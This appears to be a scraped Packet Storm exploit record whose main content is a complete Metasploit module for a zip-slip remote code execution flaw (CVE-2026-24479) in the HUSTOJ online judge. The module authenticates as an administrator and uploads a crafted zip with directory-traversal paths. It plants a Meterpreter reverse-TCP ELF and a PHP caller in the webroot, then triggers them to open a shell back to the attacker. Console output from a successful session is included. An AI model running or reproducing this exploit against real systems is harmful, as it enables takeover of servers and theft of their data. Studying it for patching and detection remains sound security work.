{“lastseen”:”2026-05-05T22:00:27″,”description”:”HUSTOJ version 26.01.24 suffers from zip-slip remote code execution vulnerability…”,”published”:”2026-05-05T00:00:00″,”modified”:”2026-05-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 HUSTOJ 26.01.24 Zip-Slip Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:220383″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24479″],”sourceData”:”# Exploit Title: HUSTOJ Zip-Slip v26.01.24 – RCE\\n # Date: 2026-02-14\\n # Exploit Author: Marshall Whittaker \/ oxagast\\n # Vendor Homepage: https:\/\/github.com\/zhblue\/hustoj\\n # Software Link: http:\/\/123.158.38.129:8090\/livecd\/HUSTOJ25.05.iso\\n (LiveCD, or see above git repo)\\n # Version: Before v26.01.24\\n # Tested on: Ubuntu\\n # CVE: CVE-2026-24479\\n \\n \\n \\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n # This payload is configured for:\\n # msfvenom -p linux\/x86\/meterpreter_reverse_tcp –format elf\\n #\\n # Patch:\\n # $file_name = $path.zip_entry_name($dir_resource);\\n # $file_name=str_replace(‘..\/’, ”, $file_name);\\n # $file_path = substr($file_name,0,strrpos($file_name, \\”\/\\”));\\n #\\n # msf exploit(local\/test\/hustoj_problem_import_rce) \\u003e exploit\\n # [*] Started reverse TCP handler on 10.0.1.35:4444\\n # [*] Running automatic check (\\”set AutoCheck false\\” to disable)\\n # [+] The target is vulnerable.\\n # [+] Payload generated!\\n # [*] Random payload tag is: 886b0 …\\n # [+] Zip file generated!\\n # [+] Connected to the target webserver!\\n # [+] Logged in successfully!\\n # [*] Checking if this account has administrative privileges…\\n # [+] This is an admin account!\\n # [*] Uploading the payload…\\n # [+] Accessed the problem import page!\\n # [+] Payload uploaded!…\\n # [*] Waiting on files to be extracted serverside…\\n # [*] This is where the zipslip happens…\\n # [*] Triggering the php script…\\n # [*] Meterpreter session 21 opened (10.0.1.35:4444 -\\u003e 10.0.1.23:51080) at 2026-02-13 06:01:07 -0500\\n # [*] Cleaning up the payload caller and shell files…\\n # [+] Boom!! Have fun!\\n #\\n # meterpreter \\u003e\\n #\\n #\\n require ‘msf\/core’\\n require ‘nokogiri’\\n require ‘digest\/md5’\\n \\n # Metasploit module for exploiting HUSTOJ problem import RCE (CVE-2026-24479)\\n class Metasploit3 \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n def initialize(info = {})\\n super(update_info(info,\\n ‘Name’ =\\u003e ‘Authenticated admin can upload crafted zip file for RCE’,\\n ‘Description’ =\\u003e \\u003c\\u003c~DESC,\\n A user with administrative privileges can abuse the problem_import_qduoj.php CGI script\\n using a crafted zip file (zip-slip) to traverse backwards through the filesystem to the\\n webroot, where they can extract a PHP file containing a shell to get full RCE in the\\n context of the webserver.\\n DESC\\n ‘Author’ =\\u003e [\\n ‘Marshall Whittaker’,\\n ‘LoTuS and friends’,\\n ‘ling101w’\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘ARCH’ =\\u003e [ARCH_X86],\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/github.com\/oxagast\/oxasploits\/blob\/JoshuaJohnWard\/exploits’ \\\\\\n ‘\/CVE-2026-24479\/hustoj_problem_import_rce.rb’],\\n [‘URL’, ‘https:\/\/github.com\/zhblue\/hustoj\/commit\/902bd09e6d0011fe89cd84d423’ \\\\\\n ‘6899314b33101f’],\\n [‘URL’, ‘https:\/\/github.com\/zhblue\/hustoj\/security\/advisories\/GHSA-xmgg-2rw4-7fxj’],\\n [‘CVE’, ‘2026-24479’],\\n [‘CWE’, ’22’]\\n ],\\n ‘Platform’ =\\u003e ‘linux’,\\n ‘Targets’ =\\u003e [\\n [\\n ‘HUSTOJ \\u003c v26.01.24 (commit 89044beb4cea758a353fd133895dec76822f4ddc)’,\\n { ‘Privileged’ =\\u003e false }\\n ]\\n ],\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘linux\/x86\/meterpreter_reverse_tcp’\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\\n },\\n ‘DisclosureDate’ =\\u003e ‘2026-01-26’,\\n ‘DefaultTarget’ =\\u003e 0))\\n register_options(\\n [\\n Opt::RPORT(80),\\n Opt::LPORT(4444),\\n OptString.new(‘RHOST’, [true, \\”The target machine’s IP\\”, ”]),\\n OptString.new(‘LHOST’, [true, \\”This machine’s IP\\”, ”]),\\n OptString.new(‘USERNAME’, [true, \\”The HUSTOJ administrative user’s username\\”, ‘admin’]),\\n OptString.new(‘PASSWORD’, [true, \\”The HUSTOJ administrative user’s password\\”, ”]),\\n OptString.new(‘DropFile’, [true, ‘The name of the file to drop on the target (without extension)’, ‘msf’]),\\n OptInt.new(‘TRIGGER_WAIT’, [true, ‘Number of seconds to wait for shell call’, 2]),\\n OptInt.new(‘traverse_limit’, [true, ‘Number of ..\/ traversals to include in zip slip paths’, 6])\\n ], self.class\\n )\\n register_advanced_options([\\n OptBool.new(‘HANDLER’,\\n [true, ‘Start an exploit\/multi\/handler job to receive the connection’,\\n true])\\n ])\\n deregister_options(‘VHOST’, ‘Proxies’, ‘RHOSTS’, ‘SSL’)\\n end\\n \\n # Check if the target is likely vulnerable\\n def check\\n res = send_request_cgi(\\n ‘uri’ =\\u003e ‘\/include\/reinfo.js’,\\n ‘method’ =\\u003e ‘GET’,\\n ‘ctype’ =\\u003e ‘application\/javascript’\\n )\\n return Exploit::CheckCode::Unknown if res.nil?\\n return Exploit::CheckCode::Appears if res.code != 200\\n return Exploit::CheckCode::Detected if res.code == 200 \\u0026\\u0026\\n res.body.include?(‘function escapeHtml(str) {‘)\\n return Exploit::CheckCode::Vulnerable if res.code == 200 \\u0026\\u0026\\n !res.body.include?(‘function escapeHtml(str) {‘)\\n \\n Exploit::CheckCode::Safe\\n end\\n \\n # Authenticate as admin and return session cookies\\n def login(user, pass)\\n res = send_request_cgi(\\n {\\n ‘uri’ =\\u003e ‘\/’,\\n ‘method’ =\\u003e ‘GET’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e ‘text\/html’\\n }, 3\\n )\\n if res \\u0026\\u0026 res.code == 200\\n print_good(\\”Connected to the target webserver! #{datastore[‘RHOST’]}:#{datastore[‘RPORT’]}\\”)\\n else\\n fail_with(\\n Failure::Unreachable,\\n ‘Failed to connect to the target webserver!’\\n )\\n end\\n cook = res.get_cookies\\n send_request_cgi(\\n ‘uri’ =\\u003e ‘\/csrf.php’,\\n ‘cookies’ =\\u003e cook,\\n ‘method’ =\\u003e ‘GET’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e ‘text\/html’\\n )\\n send_request_cgi(\\n ‘uri’ =\\u003e ‘\/loginpage.php’,\\n ‘method’ =\\u003e ‘GET’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e ‘text\/html’\\n )\\n res = send_request_cgi(\\n ‘uri’ =\\u003e ‘\/csrf.php’,\\n ‘cookies’ =\\u003e cook,\\n ‘method’ =\\u003e ‘GET’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e ‘text\/html’\\n )\\n doc = Nokogiri::HTML(res.body)\\n csrf = doc.css(‘input[name=\\”csrf\\”]’).first[‘value’]\\n send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e ‘\/login.php’,\\n ‘cookies’ =\\u003e cook,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded’,\\n ‘vars_post’ =\\u003e {\\n ‘user_id’ =\\u003e user,\\n ‘password’ =\\u003e Digest::MD5.hexdigest(pass),\\n ‘csrf’ =\\u003e csrf\\n }\\n )\\n \\n # Check if login was successful\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e ‘\/modifypage.php’,\\n ‘cookies’ =\\u003e cook,\\n ‘keep_cookies’ =\\u003e true\\n )\\n if res \\u0026\\u0026 res.code == 200 \\u0026\\u0026 res.body.include?(‘userinfo.php’)\\n stars = ‘*’ * pass.length\\n print_good(\\”Logged in successfully! #{user}:#{stars}\\”)\\n else\\n fail_with(\\n Failure::BadConfig,\\n ‘Failed to authenticate! Check credentials.’\\n )\\n end\\n \\n # Check if the account has admin privileges\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e ‘\/admin\/menu2.php’,\\n ‘cookies’ =\\u003e cook,\\n ‘keep_cookies’ =\\u003e true\\n )\\n if res \\u0026\\u0026 res.code == 200 \\u0026\\u0026 res.body.include?(‘problem_import.php’)\\n print_good(‘This is an admin account! res.body includes problem_import.php’)\\n else\\n print_error(‘This does not appear to be an admin account! Attempting to continue,’)\\n print_error(‘ but the exploit may fail at the payload upload stage…’)\\n end\\n cook\\n end\\n \\n # Upload the malicious zip payload using the admin session\\n def upload_payload(zip_dat, rand_tag, cook, dds)\\n zip_size_kb = (zip_dat.length \/ 1024.0).round(2)\\n print_status(\\”Uploading the payload… #{zip_size_kb}kb\\”)\\n # Access the problem import page to get the postkey\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘cookies’ =\\u003e cook,\\n ‘uri’ =\\u003e ‘\/admin\/problem_import.php’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e ‘text\/html’\\n )\\n if res \\u0026\\u0026 res.code == 200 \\u0026\\u0026 res.body.include?(‘problem_import_qduoj.php’)\\n print_good(‘Accessed the problem import page! \/admin\/problem_import.php’)\\n else\\n fail_with(\\n Failure::UnexpectedReply,\\n ‘Failed to access the problem import page!’\\n )\\n end\\n doc = Nokogiri::HTML(res.body)\\n postkey_input = doc.at_css(‘input[name=\\”postkey\\”]’)\\n postkey = postkey_input ? postkey_input[‘value’] : nil\\n fail_with(Failure::UnexpectedReply, ‘Failed to retrieve the postkey!’) if postkey.nil? || postkey.empty?\\n form_boundary = \\”—-WebKitFormBoundary#{rand_tag}\\”\\n form_data = \\u003c\\u003c~FORMDATA\\n –#{form_boundary}\\n Content-Disposition: form-data; name=\\”fps\\”; filename=\\”#{datastore[‘dropfile’]}.zip\\”\\n Content-Type: application\/zip\\n \\n #{zip_dat}\\n –#{form_boundary}\\n Content-Disposition: form-data; name=postkey\\n \\n #{postkey}\\n –#{form_boundary}–\\n FORMDATA\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e ‘\/admin\/problem_import_qduoj.php’,\\n ‘cookies’ =\\u003e cook,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{form_boundary}\\”,\\n ‘data’ =\\u003e form_data\\n )\\n if res \\u0026\\u0026 res.code == 200\\n print_good(\\”Payload uploaded! #{datastore[‘dropfile’]}.zip\\”)\\n else\\n print_error(‘Failed to upload the payload, trying again for a different revision…’)\\n form_data = \\u003c\\u003c~FORMDATA\\n –#{form_boundary}\\n Content-Disposition: form-data; name=\\”fps\\”; filename=\\”#{datastore[‘dropfile’]}.zip\\”\\n Content-Type: application\/zip\\n \\n #{zip_dat}\\n –#{form_boundary}\\n FORMDATA\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e ‘\/admin\/problem_import_qduoj.php’,\\n ‘cookies’ =\\u003e cook,\\n ‘keep_cookies’ =\\u003e true,\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{form_boundary}\\”,\\n ‘data’ =\\u003e form_data\\n )\\n if res \\u0026\\u0026 res.code == 200\\n print_good(\\”Payload uploaded! #{datastore[‘dropfile’]}.zip\\”)\\n else\\n fail_with(Failure::UnexpectedReply, ‘Failed to upload the payload!’)\\n end\\n end\\n print_status(\\”This is where the zipslip happens… #{dds} (levels: #{datastore[‘traverse_limit’]})\\”)\\n end\\n \\n # Trigger the uploaded PHP shell to execute the payload\\n def trigger_sploit(rand_tag)\\n print_status(\\”Triggering the php script… #{datastore[‘dropfile’]}-#{rand_tag}.php\\”)\\n send_request_raw(\\n {\\n ‘uri’ =\\u003e \\”\/#{datastore[‘dropfile’]}-#{rand_tag}.php\\”,\\n ‘ctype’ =\\u003e ‘text\/html’,\\n ‘method’ =\\u003e ‘GET’\\n },\\n datastore[‘TRIGGER_WAIT’]\\n )\\n end\\n \\n # Clean up dropped files after exploitation\\n def cleanup\\n super\\n send_request_raw(\\n {\\n ‘uri’ =\\u003e ‘\/cleanup-msf.php’,\\n ‘ctype’ =\\u003e ‘text\/html’,\\n ‘method’ =\\u003e ‘GET’\\n }\\n )\\n print_status(‘Cleaning up the payload caller and shell files…’)\\n print_good(‘Boom!! Have fun!’) unless framework.sessions.length.zero?\\n end\\n \\n # Main exploit logic\\n def exploit\\n # Generate the payload ELF binary\\n pay = framework.modules.create(datastore[‘payload’])\\n pay.datastore[‘LHOST’] = datastore[‘LHOST’]\\n pay.datastore[‘RHOST’] = datastore[‘RHOST’]\\n pay.datastore[‘LPORT’] = datastore[‘LPORT’]\\n shell_gend = pay.generate_simple({ ‘Format’ =\\u003e ‘elf’ })\\n if shell_gend == ”\\n fail_with(\\n Failure::PayloadFailed,\\n ‘Payload generation failed! Try a different payload?’\\n )\\n end\\n print_good(\\”Payload generated! #{datastore[‘payload’]}\\”)\\n \\n # Generate a random tag for file uniqueness\\n rand_tag = ‘%05x’ % rand(0xfffff + 1)\\n print_status(\\”Random payload tag #{rand_tag}\\”)\\n \\n # PHP script to call the ELF payload\\n shell_caller = \\”\\u003c?php chmod(‘\/tmp\/#{datastore[‘dropfile’]}-#{rand_tag}’, 0700); system(‘\/tmp\/#{datastore[‘dropfile’]}-#{rand_tag}’); ?\\u003e\\”\\n # PHP script to clean up dropped files\\n cleanup_caller = \\”\\u003c?php unlink(‘\/tmp\/#{datastore[‘dropfile’]}-#{rand_tag}’); unlink(‘\/home\/judge\/src\/web\/#{datastore[‘dropfile’]}\\” \\\\\\n \\”-#{rand_tag}.php’); unlink(‘\/home\/judge\/src\/web\/cleanup-msf.php’); ?\\u003e\\”\\n dds = ‘..\/’ * datastore[‘traverse_limit’] # Directory traversal string for zipslip\\n # Files to include in the malicious zip (zipslip paths for traversal)\\n files = [\\n { data: shell_gend, fname: \\”#{dds}tmp\/#{datastore[‘dropfile’]}-#{rand_tag}\\” },\\n { data: shell_caller, fname: \\”#{dds}home\/judge\/src\/web\/#{datastore[‘dropfile’]}-#{rand_tag}.php\\” },\\n { data: cleanup_caller, fname: \\”#{dds}home\/judge\/src\/web\/cleanup-msf.php\\” },\\n { data: ‘{}’, fname: ‘problem_1010.json’ },\\n { data: ”, fname: ‘problem_1010\/1.in’ },\\n { data: ”, fname: ‘problem_1010\/1.out’ }\\n ]\\n # Create the malicious zip archive\\n zip_dat = Msf::Util::EXE.to_zip(files)\\n fail_with(Failure::Unknown, ‘Zip generation failed!’) if zip_dat.empty?\\n print_good(\\”Zip file generated! Files: #{files.length}\\”)\\n \\n # Authenticate and upload the payload\\n cookies = login(datastore[‘USERNAME’], datastore[‘PASSWORD’])\\n upload_payload(zip_dat, rand_tag, cookies, dds)\\n # Trigger the PHP shell to execute the payload\\n trigger_sploit(rand_tag)\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220383″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220383\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-05T22:00:27″,”description”:”HUSTOJ version 26.01.24 suffers from zip-slip remote code execution vulnerability…”,”published”:”2026-05-05T00:00:00″,”modified”:”2026-05-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 HUSTOJ 26.01.24 Zip-Slip Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:220383″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24479″],”sourceData”:”# Exploit Title: HUSTOJ Zip-Slip v26.01.24 – RCE\\n # Date:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-51612","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n